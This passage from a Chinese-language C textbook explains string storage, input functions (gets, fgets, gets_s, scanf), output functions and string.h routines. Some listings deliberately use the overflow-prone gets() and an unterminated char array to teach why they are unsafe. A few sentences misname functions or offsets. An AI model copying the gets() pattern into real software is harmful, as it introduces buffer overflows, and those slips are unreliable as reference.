串。使用一个下标时都分别表示一个字符串,如mytalents[0]和 yourtalents[0];使用两个下标时都分别表示一个字符,例如 mytalents[1][2]表 示 mytalents 数组中第 2 个指针所指向的字符串的第 3 个字符'l', yourtalents[1][2]表示youttalentes数组的第2个字符串的第3个字符'e'。而且, 两者的初始化方式也相同。 但是,它们也有区别。mytalents数组是一个内含5个指针的数组,在我 751 们的系统中共占用40字节。而yourtalents是一个内含5个数组的数组,每个数 组内含40个char类型的值,共占用200字节。所以,虽然mytalents[0]和 yourtalents[0]都分别表示一个字符串,但mytalents和yourtalents的类型并不相 同。mytalents中的指针指向初始化时所用的字符串字面量的位置,这些字符 串字面量被储存在静态内存中;而 yourtalents 中的数组则储存着字符串字面 量的副本,所以每个字符串都被储存了两次。此外,为字符串数组分配内存 的使用率较低。yourtalents 中的每个元素的大小必须相同,而且必须是能储 存最长字符串的大小。 我们可以把yourtalents想象成矩形二维数组,每行的长度都是40字节; 把mytalents想象成不规则的数组,每行的长度不同。图 11.2 演示了这两种数 组的情况(实际上,mytalents 数组的指针元素所指向的字符串不必储存在连 续的内存中,图中所示只是为了强调两种数组的不同)。 752 图11.2 矩形数组和不规则数组 综上所述,如果要用数组表示一系列待显示的字符串,请使用指针数 组,因为它比二维字符数组的效率高。但是,指针数组也有自身的缺点。 753 mytalents 中的指针指向的字符串字面量不能更改;而yourtalentsde 中的内容 可以更改。所以,如果要改变字符串或为字符串输入预留空间,不要使用指 向字符串字面量的指针。 11.1.2 指针和字符串 读者可能已经注意到了,在讨论字符串时或多或少会涉及指针。实际 上,字符串的绝大多数操作都是通过指针完成的。例如,考虑程序清单11.5 中的程序。 程序清单11.5 p_and_s.c程序 /* p_and_s.c -- 指针和字符串 */ #include <stdio.h> int main(void) { const char * mesg = "Don't be a fool!"; const char * copy; copy = mesg; printf("%s\n", copy); printf("mesg = %s; &mesg = %p; value = %p\n", mesg,  &mesg, mesg); printf("copy = %s; &copy = %p; value = %p\n", copy,  &copy, copy); return 0; 754 } 注意 如果编译器不识别%p,用%u或%lu代替%p。 你可能认为该程序拷贝了字符串"Don't be a fool!",程序的输出似乎也验 证了你的猜测: Don't be a fool! mesg = Don't be a fool!; &mesg = 0x0012ff48; value =  0x0040a000 copy = Don't be a fool!; &copy = 0x0012ff44; value =  0x0040a000 我们来仔细分析最后两个printf()的输出。首先第1项,mesg和copy都以 字符串形式输出(%s转换说明)。这里没问题,两个字符串都是"Don't be a fool!"。 接着第2项,打印两个指针的地址。如上输出所示,指针mesg和copy分 别储存在地址为0x0012ff48和0x0012ff44的内存中。 注意最后一项,显示两个指针的值。所谓指针的值就是它储存的地址。 mesg 和 copy 的值都是0x0040a000,说明它们都指向的同一个位置。因此, 程序并未拷贝字符串。语句copy = mesg;把mesg的值赋给copy,即让copy也指 向mesg指向的字符串。 为什么要这样做?为何不拷贝整个字符串?假设数组有50个元素,考虑 一下哪种方法更效率:拷贝一个地址还是拷贝整个数组?通常,程序要完成 某项操作只需要知道地址就可以了。如果确实需要拷贝整个数组,可以使用 strcpy()或strncpy()函数,本章稍后介绍这两个函数。 我们已经讨论了如何在程序中定义字符串,接下来看看如何从键盘输入 755 字符串。 756 11.2 字符串输入 如果想把一个字符串读入程序,首先必须预留储存该字符串的空间,然 后用输入函数获取该字符串。 11.2.1 分配空间 要做的第 1 件事是分配空间,以储存稍后读入的字符串。前面提到过, 这意味着必须要为字符串分配足够的空间。不要指望计算机在读取字符串时 顺便计算它的长度,然后再分配空间(计算机不会这样做,除非你编写一个 处理这些任务的函数)。假设编写了如下代码: char *name; scanf("%s", name); 虽然可能会通过编译(编译器很可能给出警告),但是在读入name 时,name可能会擦写掉程序中的数据或代码,从而导致程序异常中止。因 为scanf()要把信息拷贝至参数指定的地址上,而此时该参数是个未初始化的 指针,name可能会指向任何地方。大多数程序员都认为出现这种情况很搞 笑,但仅限于评价别人的程序时。 最简单的方法是,在声明时显式指明数组的大小: char name[81]; 现在name是一个已分配块(81字节)的地址。还有一种方法是使用C库 函数来分配内存,第12章将详细介绍。 为字符串分配内存后,便可读入字符串。C 库提供了许多读取字符串的 函数:scanf()、gets()和fgets()。我们先讨论最常用gets()函数。 11.2.2 不幸的gets()函数 757 在读取字符串时,scanf()和转换说明%s只能读取一个单词。可是在程序 中经常要读取一整行输入,而不仅仅是一个单词。许多年前,gets()函数就 用于处理这种情况。gets()函数简单易用,它读取整行输入,直至遇到换行 符,然后丢弃换行符,储存其余字符,并在这些字符的末尾添加一个空字符 使其成为一个 C 字符串。它经常和 puts()函数配对使用,该函数用于显示字 符串,并在末尾添加换行符。程序清单11.6中演示了这两个函数的用法。 程序清单11.6 getsputs.c程序 /* getsputs.c -- 使用 gets() 和 puts() */ #include <stdio.h> #define STLEN 81 int main(void) { char words[STLEN]; puts("Enter a string, please."); gets(words); // 典型用法 printf("Your string twice:\n"); printf("%s\n", words); puts(words); puts("Done."); return 0; } 758 下面是该程序在某些编译器(或者至少是旧式编译器)中的运行示例: Enter a string, please. I want to learn about string theory! Your string twice: I want to learn about string theory! I want to learn about string theory! Done. 整行输入(除了换行符)都被储存在 words 中,puts(words)和 printf("%s\n, words")的效果相同。 下面是该程序在另一个编译器中的输出示例: Enter a string, please. warning: this program uses gets(), which is unsafe. Oh, no! Your string twice: Oh, no! Oh, no! Done. 编译器在输出中插入了一行警告消息。每次运行这个程序,都会显示这 行消息。但是,并非所有的编译器都会这样做。其他编译器可能在编译过程 中给出警告,但不会引起你的注意。 759 这是怎么回事?问题出在 gets()唯一的参数是 words,它无法检查数组 是否装得下输入行。上一章介绍过,数组名会被转换成该数组首元素的地 址,因此,gets()函数只知道数组的开始处,并不知道数组中有多少个元 素。 如果输入的字符串过长,会导致缓冲区溢出(buffer overflow),即多 余的字符超出了指定的目标空间。如果这些多余的字符只是占用了尚未使用 的内存,就不会立即出现问题;如果它们擦写掉程序中的其他数据,会导致 程序异常中止;或者还有其他情况。为了让输入的字符串容易溢出,把程序 中的STLEN设置为5,程序的输出如下: Enter a string, please. warning: this program uses gets(), which is unsafe. I think I'll be just fine. Your string twice: I think I'll be just fine. I think I'll be just fine. Done. Segmentation fault: 11 “Segmentation fault”(分段错误)似乎不是个好提示,的确如此。在 UNIX系统中,这条消息说明该程序试图访问未分配的内存。 C 提供解决某些编程问题的方法可能会导致陷入另一个尴尬棘手的困 境。但是,为什么要特别提到gets()函数?因为该函数的不安全行为造成了 安全隐患。过去,有些人通过系统编程,利用gets()插入和运行一些破坏系 统安全的代码。 760 不久,C 编程社区的许多人都建议在编程时摒弃 gets()。制定 C99 标准 的委员会把这些建议放入了标准,承认了gets()的问题并建议不要再使用 它。尽管如此,在标准中保留gets()也合情合理,因为现有程序中含有大量 使用该函数的代码。而且,只要使用得当,它的确是一个很方便的函数。 好景不长,C11标准委员会采取了更强硬的态度,直接从标准中废除了 gets()函数。既然标准已经发布,那么编译器就必须根据标准来调整支持什 么,不支持什么。然而在实际应用中,编译器为了能兼容以前的代码,大部 分都继续支持gets()函数。不过,我们使用的编译器,可没那么大方。 11.2.3 gets()的替代品 过去通常用fgets()来代替gets(),fgets()函数稍微复杂些,在处理输入方 面与gets()略有不同。C11标准新增的gets_s()函数也可代替gets()。该函数与 gets()函数更接近,而且可以替换现有代码中的gets()。但是,它是stdio.h输 入/输出函数系列中的可选扩展,所以支持C11的编译器也不一定支持它。 1.fgets()函数(和fputs()) fgets()函数通过第2个参数限制读入的字符数来解决溢出的问题。该函 数专门设计用于处理文件输入,所以一般情况下可能不太好用。fgets()和 gets()的区别如下。 fgets()函数的第2个参数指明了读入字符的最大数量。如果该参数的值 是n,那么fgets()将读入n-1个字符,或者读到遇到的第一个换行符为止。 如果fgets()读到一个换行符,会把它储存在字符串中。这点与gets()不 同,gets()会丢弃换行符。 fgets()函数的第3 个参数指明要读入的文件。如果读入从键盘输入的数 据,则以stdin(标准输入)作为参数,该标识符定义在stdio.h中。 因为 fgets()函数把换行符放在字符串的末尾(假设输入行不溢出),通 常要与 fputs()函数(和puts()类似)配对使用,除非该函数不在字符串末尾 761 添加换行符。fputs()函数的第2个参数指明它要写入的文件。如果要显示在 计算机显示器上,应使用stdout(标准输出)作为该参数。程序清单11.7演 示了fgets()和fputs()函数的用法。 程序清单11.7 fgets1.c程序 /* fgets1.c -- 使用 fgets() 和 fputs() */ #include <stdio.h> #define STLEN 14 int main(void) { char words[STLEN]; puts("Enter a string, please."); fgets(words, STLEN, stdin); printf("Your string twice (puts(), then fputs()):\n"); puts(words); fputs(words, stdout); puts("Enter another string, please."); fgets(words, STLEN, stdin); printf("Your string twice (puts(), then fputs()):\n"); puts(words); fputs(words, stdout); 762 puts("Done."); return 0; } 下面是该程序的输出示例: Enter a string, please. apple pie Your string twice (puts(), then fputs()): apple pie apple pie Enter another string, please. strawberry shortcake Your string twice (puts(), then fputs()): strawberry sh strawberry shDone. 第1行输入,apple pie,比fgets()读入的整行输入短,因此,apple pie\n\0 被储存在数组中。所以当puts()显示该字符串时又在末尾添加了换行符,因 此apple pie后面有一行空行。因为fputs()不在字符串末尾添加换行符,所以 并未打印出空行。 第2行输入,strawberry shortcake,超过了大小的限制,所以fgets()只读 入了13个字符,并把strawberry sh\0 储存在数组中。再次提醒读者注意, puts()函数会在待输出字符串末尾添加一个换行符,而fputs()不会这样做。 763 fputs()函数返回指向 char的指针。如果一切进行顺利,该函数返回的地 址与传入的第 1 个参数相同。但是,如果函数读到文件结尾,它将返回一个 特殊的指针:空指针(null pointer)。该指针保证不会指向有效的数据,所 以可用于标识这种特殊情况。在代码中,可以用数字0来代替,不过在C语 言中用宏NULL来代替更常见(如果在读入数据时出现某些错误,该函数也 返回NULL)。程序清单11.8演示了一个简单的循环,读入并显示用户输入 的内容,直到fgets()读到文件结尾或空行(即,首字符是换行符)。 程序清单11.8 fgets2.c程序 /* fgets2.c -- 使用 fgets() 和 fputs() */ #include <stdio.h> #define STLEN 10 int main(void) { char words[STLEN]; puts("Enter strings (empty line to quit):"); while (fgets(words, STLEN, stdin) != NULL &&  words[0] != '\n') fputs(words, stdout); puts("Done."); return 0; } 下面是该程序的输出示例: 764 Enter strings (empty line to quit): By the way, the gets() function By the way, the gets() function also returns a null pointer if it also returns a null pointer if it encounters end-of-file. encounters end-of-file. Done. 有意思,虽然STLEN被设置为10,但是该程序似乎在处理过长的输入时 完全没问题。程序中的fgets()一次读入 STLEN - 1 个字符(该例中为 9 个字 符)。所以,一开始它只读入了“By the wa”,并储存为By the wa\0;接着 fputs()打印该字符串,而且并未换行。然后while循环进入下一轮迭代, fgets()继续从剩余的输入中读入数据,即读入“y, the ge”并储存为y, the ge\0; 接着fputs()在刚才打印字符串的这一行接着打印第 2 次读入的字符串。然后 while 进入下一轮迭代,fgets()继续读取输入、fputs()打印字符串,这一过程 循环进行,直到读入最后的“tion\n”。fgets()将其储存为tion\n\0, fputs()打印 该字符串,由于字符串中的\n,光标被移至下一行开始处。 系统使用缓冲的I/O。这意味着用户在按下Return键之前,输入都被储存 在临时存储区(即,缓冲区)中。按下Return键就在输入中增加了一个换行 符,并把整行输入发送给fgets()。对于输出,fputs()把字符发送给另一个缓 冲区,当发送换行符时,缓冲区中的内容被发送至屏幕上。 fgets()储存换行符有好处也有坏处。坏处是你可能并不想把换行符储存 在字符串中,这样的换行符会带来一些麻烦。好处是对于储存的字符串而 言,检查末尾是否有换行符可以判断是否读取了一整行。如果不是一整行, 765 要妥善处理一行中剩下的字符。 首先,如何处理掉换行符?一个方法是在已储存的字符串中查找换行 符,并将其替换成空字符: while (words[i] != '\n') // 假设\n在words中 i++; words[i] = '\0'; 其次,如果仍有字符串留在输入行怎么办?一个可行的办法是,如果目 标数组装不下一整行输入,就丢弃那些多出的字符: while (getchar() != '\n') // 读取但不储存输入,包括\n continue; 程序清单11.9在程序清单11.8的基础上添加了一部分测试代码。该程序 读取输入行,删除储存在字符串中的换行符,如果没有换行符,则丢弃数组 装不下的字符。 程序清单11.9 fgets3.c程序 /* fgets3.c -- 使用 fgets() */ #include <stdio.h> #define STLEN 10 int main(void) { char words[STLEN]; 766 int i; puts("Enter strings (empty line to quit):"); while (fgets(words, STLEN, stdin) != NULL &&  words[0] != '\n') { i = 0; while (words[i] != '\n' && words[i] != '\0') i++; if (words[i] == '\n') words[i] = '\0'; else // 如果word[i] == '\0'则执行这部分代码 while (getchar() != '\n') continue; puts(words); } puts("done"); return 0; } 循环 767 while (words[i] != '\n' && words[i] != '\0') i++; 遍历字符串,直至遇到换行符或空字符。如果先遇到换行符,下面的if 语句就将其替换成空字符;如果先遇到空字符,else部分便丢弃输入行的剩 余字符。下面是该程序的输出示例: Enter strings (empty line to quit): This This program seems program s unwilling to accept long lines. unwilling But it doesn't get stuck on long But it do lines either. lines eit done 空字符和空指针 程序清单 11.9 中出现了空字符和空指针。从概念上看,两者完全不 同。空字符(或'\0')是用于标记C字符串末尾的字符,其对应字符编码是 768 0。由于其他字符的编码不可能是 0,所以不可能是字符串的一部分。 空指针(或NULL)有一个值,该值不会与任何数据的有效地址对应。 通常,函数使用它返回一个有效地址表示某些特殊情况发生,例如遇到文件 结尾或未能按预期执行。 空字符是整数类型,而空指针是指针类型。两者有时容易混淆的原因 是:它们都可以用数值0来表示。但是,从概念上看,两者是不同类型的0。 另外,空字符是一个字符,占1字节;而空指针是一个地址,通常占4字节。 2.gets_s()函数 C11新增的gets_s()函数(可选)和fgets()类似,用一个参数限制读入的 字符数。假设把程序清单11.9中的fgets()换成gets_s(),其他内容不变,那么 下面的代码将把一行输入中的前9个字符读入words数组中,假设末尾有换行 符: gets_s(words, STLEN); gets_s()与fgets()的区别如下。 gets_s()只从标准输入中读取数据,所以不需要第3个参数。 如果gets_s()读到换行符,会丢弃它而不是储存它。 如果gets_s()读到最大字符数都没有读到换行符,会执行以下几步。首 先把目标数组中的首字符设置为空字符,读取并丢弃随后的输入直至读到换 行符或文件结尾,然后返回空指针。接着,调用依赖实现的“处理函数”(或 你选择的其他函数),可能会中止或退出程序。 第2个特性说明,只要输入行未超过最大字符数,gets_s()和gets()几乎一 样,完全可以用gets_s()替换gets()。第3个特性说明,要使用这个函数还需要 进一步学习。 我们来比较一下 gets()、fgets()和 gets_s()的适用性。如果目标存储区装 769 得下输入行,3 个函数都没问题。但是fgets()会保留输入末尾的换行符作为 字符串的一部分,要编写额外的代码将其替换成空字符。 如果输入行太长会怎样?使用gets()不安全,它会擦写现有数据,存在 安全隐患。gets_s()函数很安全,但是,如果并不希望程序中止或退出,就 要知道如何编写特殊的“处理函数”。另外,如果打算让程序继续运行, gets_s()会丢弃该输入行的其余字符,无论你是否需要。由此可见,当输入 太长,超过数组可容纳的字符数时,fgets()函数最容易使用,而且可以选择 不同的处理方式。如果要让程序继续使用输入行中超出的字符,可以参考程 序清单11.8中的处理方法。如果想丢弃输入行的超出字符,可以参考程序清 单11.9中的处理方法。 所以,当输入与预期不符时,gets_s()完全没有fgets()函数方便、灵活。 也许这也是gets_s()只作为C库的可选扩展的原因之一。鉴于此,fgets()通常 是处理类似情况的最佳选择。 3.s_gets()函数 程序清单11.9演示了fgets()函数的一种用法:读取整行输入并用空字符 代替换行符,或者读取一部分输入,并丢弃其余部分。既然没有处理这种情 况的标准函数,我们就创建一个,在后面的程序中会用得上。程序清单 11.10提供了一个这样的函数。 程序清单11.10 s_gets()函数 char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); 770 if (ret_val) // 即,ret_val != NULL { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 如果 fgets()返回 NULL,说明读到文件结尾或出现读取错误,s_gets()函 数跳过了这个过程。它模仿程序清单11.9的处理方法,如果字符串中出现换 行符,就用空字符替换它;如果字符串中出现空字符,就丢弃该输入行的其 余字符,然后返回与fgets()相同的值。我们在后面的示例中将讨论fgets()函 数。 也许读者想了解为什么要丢弃过长输入行中的余下字符。这是因为,输 入行中多出来的字符会被留在缓冲区中,成为下一次读取语句的输入。例 如,如果下一条读取语句要读取的是 double 类型的值,就可能导致程序崩 溃。丢弃输入行余下的字符保证了读取语句与键盘输入同步。 我们设计的 s_gets()函数并不完美,它最严重的缺陷是遇到不合适的输 771 入时毫无反应。它丢弃多余的字符时,既不通知程序也不告知用户。但是, 用来替换前面程序示例中的gets()足够了。 11.2.4 scanf()函数 我们再来研究一下scanf()。前面的程序中用scanf()和%s转换说明读取字 符串。scanf()和gets()或fgets()的区别在于它们如何确定字符串的末尾: scanf()更像是“获取单词”函数,而不是“获取字符串”函数;如果预留的存储 区装得下输入行,gets()和fgets()会读取第1个换行符之前所有的字符。 scanf()函数有两种方法确定输入结束。无论哪种方法,都从第1个非空白字 符作为字符串的开始。如果使用%s转换说明,以下一个空白字符(空行、 空格、制表符或换行符)作为字符串的结束(字符串不包括空白字符)。如 果指定了字段宽度,如%10s,那么scanf()将读取10 个字符或读到第1个空白 字符停止(先满足的条件即是结束输入的条件),见图11.3。 图11.3 字段宽度和scanf() 前面介绍过,scanf()函数返回一个整数值,该值等于scanf()成功读取的 项数或EOF(读到文件结尾时返回EOF)。 程序清单11.11演示了在scanf()函数中指定字段宽度的用法。 程序清单11.11 scan_str.c程序 /* scan_str.c -- 使用 scanf() */ #include <stdio.h> 772 int main(void) { char name1[11], name2[11]; int count; printf("Please enter 2 names.\n"); count = scanf("%5s %10s", name1, name2); printf("I read the %d names %s and %s.\n", count, name1,  name2); return 0; } 下面是该程序的3个输出示例: Please enter 2 names. Jesse Jukes I read the 2 names Jesse and Jukes. Please enter 2 names. Liza Applebottham I read the 2 names Liza and Applebotth. Please enter 2 names. Portensia Callowit 773 I read the 2 names Porte and nsia. 第1个输出示例,两个名字的字符个数都未超过字段宽度。第2个输出示 例,只读入了Applebottham的前10个字符Applebotth(因为使用了%10s转换 说明)。第3个输出示例,Portensia的后4个字符nsia被写入name2中,因为第 2次调用scanf()时,从上一次调用结束的地方继续读取数据。在该例中,读 取的仍是Portensia中的字母。 根据输入数据的性质,用fgets()读取从键盘输入的数据更合适。例如, scanf()无法完整读取书名或歌曲名,除非这些名称是一个单词。scanf()的典 型用法是读取并转换混合数据类型为某种标准形式。例如,如果输入行包含 一种工具名、库存量和单价,就可以使用scanf()。否则可能要自己拼凑一个 函数处理一些输入检查。如果一次只输入一个单词,用scanf()也没问题。 scanf()和gets()类似,也存在一些潜在的缺点。如果输入行的内容过长, scanf()也会导致数据溢出。不过,在%s转换说明中使用字段宽度可防止溢 出。 774 11.3 字符串输出 讨论完字符串输入,接下来我们讨论字符串输出。C有3个标准库函数 用于打印字符串:put()、fputs()和printf()。 11.3.1 puts()函数 puts()函数很容易使用,只需把字符串的地址作为参数传递给它即可。 程序清单11.12演示了puts()的一些用法。 程序清单11.12 put_out.c程序 /* put_out.c -- 使用 puts() */ #include <stdio.h> #define DEF "I am a #defined string." int main(void) { char str1[80] = "An array was initialized to me."; const char * str2 = "A pointer was initialized to me."; puts("I'm an argument to puts()."); puts(DEF); puts(str1); puts(str2); puts(&str1[5]); 775 puts(str2 + 4); return 0; } 该程序的输出如下: I'm an argument to puts(). I am a #defined string. An array was initialized to me. A pointer was initialized to me. ray was initialized to me. inter was initialized to me. 如上所示,每个字符串独占一行,因为puts()在显示字符串时会自动在 其末尾添加一个换行符。 该程序示例再次说明,用双引号括起来的内容是字符串常量,且被视为 该字符串的地址。另外,储存字符串的数组名也被看作是地址。在第5个 puts()调用中,表达式&str1[5]是str1数组的第6个元素(r),puts()从该元素 开始输出。与此类似,第6个puts()调用中,str2+4指向储存"pointer"中i的存 储单元,puts()从这里开始输出。 puts()如何知道在何处停止?该函数在遇到空字符时就停止输出,所以 必须确保有空字符。不要模仿程序清单11.13中的程序! 程序清单11.13 nono.c程序 /* nono.c -- 千万不要模仿! */ 776 #include <stdio.h> int main(void) { char side_a[] = "Side A"; char dont[] = { 'W', 'O', 'W', '!' }; char side_b[] = "Side B"; puts(dont); /* dont 不是一个字符串 */ return 0; } 由于dont缺少一个表示结束的空字符,所以它不是一个字符串,因此 puts()不知道在何处停止。它会一直打印dont后面内存中的内容,直到发现一 个空字符为止。为了让puts()能尽快读到空字符,我们把dont放在side_a和 side_b之间。下面是该程序的一个运行示例: WOW!Side A 我们使用的编译器把side_a数组储存在dont数组之后,所以puts()一直输 出至遇到side_a中的空字符。你所使用的编译器输出的内容可能不同,这取 决于编译器如何在内存中储存数据。如果删除程序中的side_a和side_b数组 会怎样?通常内存中有许多空字符,如果幸运的话,puts()很快就会发现一 个。但是,这样做很不靠谱。 11.3.2 fputs()函数 fputs()函数是puts()针对文件定制的版本。它们的区别如下。 fputs()函数的第 2 个参数指明要写入数据的文件。如果要打印在显示器 777 上,可以用定义在stdio.h中的stdout(标准输出)作为该参数。 与puts()不同,fputs()不会在输出的末尾添加换行符。 注意,gets()丢弃输入中的换行符,但是puts()在输出中添加换行符。另 一方面,fgets()保留输入中的换行符,fputs()不在输出中添加换行符。假设 要编写一个循环,读取一行输入,另起一行打印出该输入。可以这样写: char line[81]; while (gets(line))// 与while (gets(line) != NULL)相同 puts(line); 如果gets()读到文件结尾会返回空指针。对空指针求值为0(即为假), 这样便可结束循环。或者,可以这样写: char line[81]; while (fgets(line, 81, stdin)) fputs(line, stdout); 第1个循环(使用gets()和puts()的while循环),line数组中的字符串显示 在下一行,因为puts()在字符串末尾添加了一个换行符。第2个循环(使用 fgets()和fputs()的while循环),line数组中的字符串也显示在下一行,因为 fgets()把换行符储存在字符串末尾。注意,如果混合使用 fgets()输入和puts() 输出,每个待显示的字符串末尾就会有两个换行符。这里关键要注意: puts()应与gets()配对使用,fputs()应与fgets()配对使用。 我们在这里提到已被废弃的 gets(),并不是鼓励使用它,而是为了让读 者了解它的用法。如果今后遇到包含该函数的代码,不至于看不懂。 11.3.3 printf()函数 778 在第4章中,我们详细讨论过printf()函数的用法。和puts()一样,printf() 也把字符串的地址作为参数。printf()函数用起来没有puts()函数那么方便, 但是它更加多才多艺,因为它可以格式化不同的数据类型。 与puts()不同的是,printf()不会自动在每个字符串末尾加上一个换行 符。因此,必须在参数中指明应该在哪里使用换行符。例如: printf("%s\n", string); 和下面的语句效果相同: puts(string); 如上所示,printf()的形式更复杂些,需要输入更多代码,而且计算机执 行的时间也更长(但是你觉察不到)。然而,使用 printf()打印多个字符串 更加简单。例如,下面的语句把 Well、用户名和一个#define定义的字符串 打印在一行: printf("Well, %s, %s\n", name, MSG); 779 11.4 自定义输入/输出函数 不一定非要使用C库中的标准函数,如果无法使用这些函数或者不想用 它们,完全可以在getchar()和putchar()的基础上自定义所需的函数。假设你 需要一个类似puts()但是不会自动添加换行符的函数。程序清单11.14给出了 一个这样的函数。 程序清单11.14 put1()函数 /* put1.c -- 打印字符串,不添加\n */ #include <stdio.h> void put1(const char * string)/* 不会改变字符串 */ { while (*string != '\0') putchar(*string++); } 指向char的指针string最初指向传入参数的首元素。因为该函数不会改变 传入的字符串,所以形参使用了const限定符。打印了首元素的内容后,指 针递增1,指向下一个元素。while循环重复这一过程,直到指针指向包含空 字符的元素。记住,++的优先级高于*,因此putchar(*string++)打印string指 向的值,递增的是string本身,而不是递增它所指向的字符。 可以把 put1.c 程序作为编写字符串处理函数的模型。因为每个字符串都 以空字符结尾,所以不用给函数传递字符串的大小。函数依次处理每个字 符,直至遇到空字符。 用数组表示法编写这个函数稍微复杂些: 780 int i = 0; while (string[i]!= '\0') putchar(string[i++]); 要为数组索引创建一个额外的变量。 许多C程序员会在while循环中使用下面的测试条件: while (*string) 当string指向空字符时,*string的值是0,即测试条件为假,while循环结 束。这种方法比上面两种方法简洁。但是,如果不熟悉C语言,可能觉察不 出来。这种处理方法很普遍,作为C程序员应该熟悉这种写法。 注意 为什么程序清单11.14中的形式参数是const char * string,而不是const char sting[]?从技术方面看,两者等价且都有效。使用带方括号的写法是为 了提醒用户:该函数处理的是数组。然而,如果要处理字符串,实际参数可 以是数组名、用双引号括起来的字符串,或声明为 char *类型的变量。用 const char * string可以提醒用户:实际参数不一定是数组。 假设要设计一个类似puts()的函数,而且该函数还给出待打印字符的个 数。如程序清单11.15所示,添加一个功能很简单。 程序清单11.15 put2.c程序 /* put2.c -- 打印一个字符串,并统计打印的字符数 */ #include <stdio.h> int put2(const char * string) { 781 int count = 0; while (*string)  /* 常规用法 */ { putchar(*string++); count++; } putchar('\n');  /* 不统计换行符 */ return(count); } 下面的函数调用将打印字符串pizza: put1("pizza"); 下面的调用将返回统计的字符数,并将其赋给num(该例中,num的值 是5): num = put2("pizza"); 程序清单11.16使用一个简单的驱动程序测试put1()和put2(),并演示了嵌 套函数的调用。 程序清单11.16 .c程序 //put_put.c -- 用户自定义输出函数 #include <stdio.h> void put1(const char *); 782 int put2(const char *); int main(void) { put1("If I'd as much money"); put1(" as I could spend,\n"); printf("I count %d characters.\n", put2("I never would cry old chairs to mend.")); return 0; } void put1(const char * string) { while (*string) /* 与 *string != '\0' 相同 */ putchar(*string++); } int put2(const char * string) { int count = 0; while (*string) { 783 putchar(*string++); count++; } putchar('\n'); return(count); } 程序中使用 printf()打印 put2()的值,但是为了获得 put2()的返回值,计 算机必须先执行put2(),因此在打印字符数之前先打印了传递给该函数的字 符串。下面是该程序的输出: If I'd as much money as I could spend, I never would cry old chairs to mend. I count 37 characters. 784 11.5 字符串函数 C库提供了多个处理字符串的函数,ANSI C把这些函数的原型放在 string.h头文件中。其中最常用的函数有 strlen()、strcat()、strcmp()、 strncmp()、strcpy()和 strncpy()。另外,还有sprintf()函数,其原型在stdio.h头 文件中。欲了解string.h系列函数的完整列表,请查阅附录B中的参考资料 V“新增C99和C11的标准ANSI C库”。 11.5.1 strlen()函数 strlen()函数用于统计字符串的长度。下面的函数可以缩短字符串的长 度,其中用到了strlen(): void fit(char *string, unsigned int size) { if (strlen(string) > size) string[size] = '\0'; } 该函数要改变字符串,所以函数头在声明形式参数string时没有使用 const限定符。 程序清单11.17中的程序测试了fit()函数。注意代码中使用了C字符串常 量的串联特性。 程序清单11.17 test_fit.c程序 /* test_fit.c -- 使用缩短字符串长度的函数 */ #include <stdio.h> 785 #include <string.h>  /* 内含字符串函数原型 */ void fit(char *, unsigned int); int main(void) { char mesg [] = "Things should be as simple as possible," " but not simpler."; puts(mesg); fit(mesg, 38); puts(mesg); puts("Let's look at some more of the string."); puts(mesg + 39); return 0; } void fit(char *string, unsigned int size) { if (strlen(string) > size) string[size] = '\0'; } 下面是该程序的输出: 786 Things should be as simple as possible, but not simpler. Things should be as simple as possible Let's look at some more of the string. but not simpler. fit()函数把第39个元素的逗号替换成'\0'字符。puts()函数在空字符处停止 输出,并忽略其余字符。然而,这些字符还在缓冲区中,下面的函数调用把 这些字符打印了出来: puts(mesg + 8); 表达式mesg + 39是mesg[39]的地址,该地址上储存的是空格字符。所以 put()显示该字符并继续输出直至遇到原来字符串中的空字符。图11.4演示了 这一过程。 图11.4 puts()函数和空字符 注意 一些ANSI之前的系统使用strings.h头文件,而有些系统可能根本没有字 787 符串头文件。 string.h头文件中包含了C字符串函数系列的原型,因此程序清单11.17要 包含该头文件。 11.5.2 strcat()函数 strcat()(用于拼接字符串)函数接受两个字符串作为参数。该函数把第 2个字符串的备份附加在第1个字符串末尾,并把拼接后形成的新字符串作为 第1个字符串,第2个字符串不变。strcat()函数的类型是char *(即,指向char 的指针)。strcat()函数返回第1个参数,即拼接第2个字符串后的第1个字符 串的地址。 程序清单11.18演示了strcat()的用法。该程序还使用了程序清单11.10的 s_gets()函数。回忆一下,该函数使用fgets()读取一整行,如果有换行符,将 其替换成空字符。 程序清单11.18 str_cat.c程序 /* str_cat.c -- 拼接两个字符串 */ #include <stdio.h> #include <string.h> /* strcat()函数的原型在该头文件中 */ #define SIZE 80 char * s_gets(char * st, int n); int main(void) { char flower[SIZE]; char addon [] = "s smell like old shoes."; 788 puts("What is your favorite flower?"); if (s_gets(flower, SIZE)) { strcat(flower, addon); puts(flower); puts(addon); } else puts("End of file encountered!"); puts("bye"); return 0; } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { 789 while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 该程序的输出示例如下: What is your favorite flower? wonderflower wonderflowers smell like old shoes. s smell like old shoes. bye 从以上输出可以看出,flower改变了,而addon保持不变。 11.5.3 strncat()函数 strcat()函数无法检查第1个数组是否能容纳第2个字符串。如果分配给第 790 1个数组的空间不够大,多出来的字符溢出到相邻存储单元时就会出问题。 当然,可以像程序清单11.15那样,用strlen()查看第1个数组的长度。注意, 要给拼接后的字符串长度加1才够空间存放末尾的空字符。或者,用 strncat(),该函数的第3 个参数指定了最大添加字符数。例如,strncat(bugs, addon, 13)将把 addon字符串的内容附加给bugs,在加到第13个字符或遇到空 字符时停止。因此,算上空字符(无论哪种情况都要添加空字符),bugs数 组应该足够大,以容纳原始字符串(不包含空字符)、添加原始字符串在后 面的13个字符和末尾的空字符。程序清单11.19使用这种方法,计算avaiable 变量的值,用于表示允许添加的最大字符数。 程序清单11.19 join_chk.c程序 /* join_chk.c -- 拼接两个字符串,检查第1个数组的大小 */ #include <stdio.h> #include <string.h> #define SIZE 30 #define BUGSIZE 13 char * s_gets(char * st, int n); int main(void) { char flower[SIZE]; char addon [] = "s smell like old shoes."; char bug[BUGSIZE]; int available; 791 puts("What is your favorite flower?"); s_gets(flower, SIZE); if ((strlen(addon) + strlen(flower) + 1) <= SIZE) strcat(flower, addon); puts(flower); puts("What is your favorite bug?"); s_gets(bug, BUGSIZE); available = BUGSIZE - strlen(bug) - 1; strncat(bug, addon, available); puts(bug); return 0; } char * s_gets(char * st, int n) 